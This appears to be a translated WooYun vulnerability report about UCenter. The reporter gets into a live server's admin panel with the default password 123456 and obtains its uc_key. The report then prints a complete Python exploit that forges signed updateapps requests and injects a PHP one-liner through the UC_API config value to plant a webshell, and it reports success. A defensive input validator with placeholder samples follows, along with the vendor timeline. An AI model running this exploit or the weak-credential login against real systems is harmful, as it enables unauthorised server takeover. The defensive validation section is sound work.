2016-04-22: Details have been sent to the vendor and are awaiting the vendor's handling
2016-04-22: The vendor has confirmed; details are disclosed to the vendor only
2016-05-02: Details disclosed to core white hats and experts in related fields
2016-05-12: Details disclosed to ordinary white hats
2016-05-22: Details disclosed to intern white hats
2016-06-06: Details disclosed to the public
Honestly, I am not convinced (。•ˇ‸ˇ•。) http://wooyun.org/bugs/wooyun-2016-0198952 privilege escalation plus an outbound connection, and it only got 5 rank; I'm not playing with you any more (╯°□°)╯︵ ┻━┻
http://180.153.190.79:8880/uc_server/admin.php?
La la, clicked in, default account, tried the weak password 123456 and accidentally got in.
Went into Application Management.
uc_key is the shared secret used to encrypt the parameters passed by the caller, so the request can be constructed with a script:
#! /usr/bin/env python
# coding=utf-8
import hashlib
import time
import math
import base64
import urllib
import urllib2
import sys


def microtime(get_as_float=False):
    # Mimics PHP's microtime(), which UCenter feeds into the keyc salt
    if get_as_float:
        return time.time()
    else:
        return '%.8f %d' % math.modf(time.time())


def get_authcode(string, key=''):
    # Re-implementation of UCenter's authcode() encode path:
    # keya/keyb are derived from md5(uc_key), keyc is a 4-char per-message salt
    ckey_length = 4
    key = hashlib.md5(key).hexdigest()
    keya = hashlib.md5(key[0:16]).hexdigest()
    keyb = hashlib.md5(key[16:32]).hexdigest()
    keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:]
    #keyc = (hashlib.md5('0.736000 1389448306').hexdigest())[-ckey_length:]
    cryptkey = keya + hashlib.md5(keya + keyc).hexdigest()
    key_length = len(cryptkey)
    # 10-digit expiry (0 = never) + 16-char keyed md5 check + the plaintext
    string = '0000000000' + \
        (hashlib.md5(string + keyb)).hexdigest()[0:16] + string
    string_length = len(string)
    result = ''
    box = range(0, 256)
    rndkey = dict()
    for i in range(0, 256):
        rndkey[i] = ord(cryptkey[i % key_length])
    # RC4-style key scheduling
    j = 0
    for i in range(0, 256):
        j = (j + box[i] + rndkey[i]) % 256
        tmp = box[i]
        box[i] = box[j]
        box[j] = tmp
    # RC4-style keystream XOR
    a = 0
    j = 0
    for i in range(0, string_length):
        a = (a + 1) % 256
        j = (j + box[a]) % 256
        tmp = box[a]
        box[a] = box[j]
        box[j] = tmp
        result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]))
    return keyc + base64.b64encode(result).replace('=', '')


def get_shell(url, key, host):
    ''' Send the command and obtain the webshell '''
    headers = {'Accept-Language': 'zh-cn',
               'Content-Type': 'application/x-www-form-urlencoded',
               'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)',
               'Referer': url
               }
    tm = time.time() + 10 * 3600
    tm = "time=%d&action=updateapps" % tm
    code = urllib.quote(get_authcode(tm, key))
    url = url + "?code=" + code
    data1 = '''<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">http://xxx\');一句话//</item>
</root>'''
    try:
        req = urllib2.Request(url, data=data1, headers=headers)
        ret = urllib2.urlopen(req)
    except:
        return "访问出错"
    data2 = '''<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">http://aaa</item>
</root>'''
    try:
        req = urllib2.Request(url, data=data2, headers=headers)
        ret = urllib2.urlopen(req)
    except:
        return "error"
    return "webshell:"


if __name__ == '__main__':
    host = '123.123.123.123'
    key = 'uckey'
    url = host + "/api/uc.php"
    print get_shell(url, key, host)
Successfully got a shell.
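The `');…//` shape of the UC_API payload shows that the updateapps handler writes the submitted value into a quoted string in the application's config without escaping it, so a single quote is enough to break out. The following input validation for the receiving side is an added example written for this note, not code from the report or from UCenter; the two XML bodies are constructed samples and the URL allowlist is an assumption.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample request bodies. The first mirrors the shape of the
# injected UC_API value from the report (payload replaced by a placeholder),
# the second is a legitimate update.
INJECTED_BODY = """<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">http://xxx');PAYLOAD_PLACEHOLDER//</item>
</root>"""

BENIGN_BODY = """<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">http://bbs.example.com/uc_server</item>
</root>"""

# Assumed allowlist for an application URL: scheme, host[:port], plain path.
# Quotes, parentheses, semicolons and backslashes are deliberately excluded.
_URL_RE = re.compile(r"^https?://[A-Za-z0-9.-]+(?::\d{1,5})?(?:/[A-Za-z0-9._~/-]*)?$")
_ITEM_ID_RE = re.compile(r"^[A-Z][A-Z0-9_]*$")


def parse_updateapps(body: str) -> dict:
    """Return {item id: value} from an updateapps XML body."""
    root = ET.fromstring(body.encode("iso-8859-1"))
    return {item.get("id", ""): (item.text or "") for item in root.iter("item")}


def validate_updateapps(body: str) -> tuple:
    """Accept the body only if every value is safe to write into a quoted
    config string: item ids are identifiers, *_API values match the URL
    allowlist, and no value carries quote or escape characters."""
    try:
        items = parse_updateapps(body)
    except ET.ParseError as exc:
        return False, "malformed XML: %s" % exc
    for item_id, value in items.items():
        if not _ITEM_ID_RE.match(item_id):
            return False, "bad item id %r" % item_id
        if any(ch in value for ch in "'\"\\\r\n"):
            return False, "%s contains quote or escape characters" % item_id
        if item_id.endswith("_API") and not _URL_RE.match(value):
            return False, "%s is not a plain URL: %r" % (item_id, value)
    return True, "ok"


if __name__ == "__main__":
    for name, body in (("injected", INJECTED_BODY), ("benign", BENIGN_BODY)):
        print(name, validate_updateapps(body))
```

Rejecting the value is only half of the fix; the updateapps action should also be limited to the UCenter server itself, since a leaked uc_key (here obtained through a default admin password) lets anyone produce a valid `code` parameter.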
Whatever you like, hmph (╯°□°)╯︵ ┻━┻
Severity: Medium
Vulnerability Rank: 5
Confirmed at: 2016-04-22 16:50
Thanks, white hat 可爱多, (*^__^*) hee hee……
None yet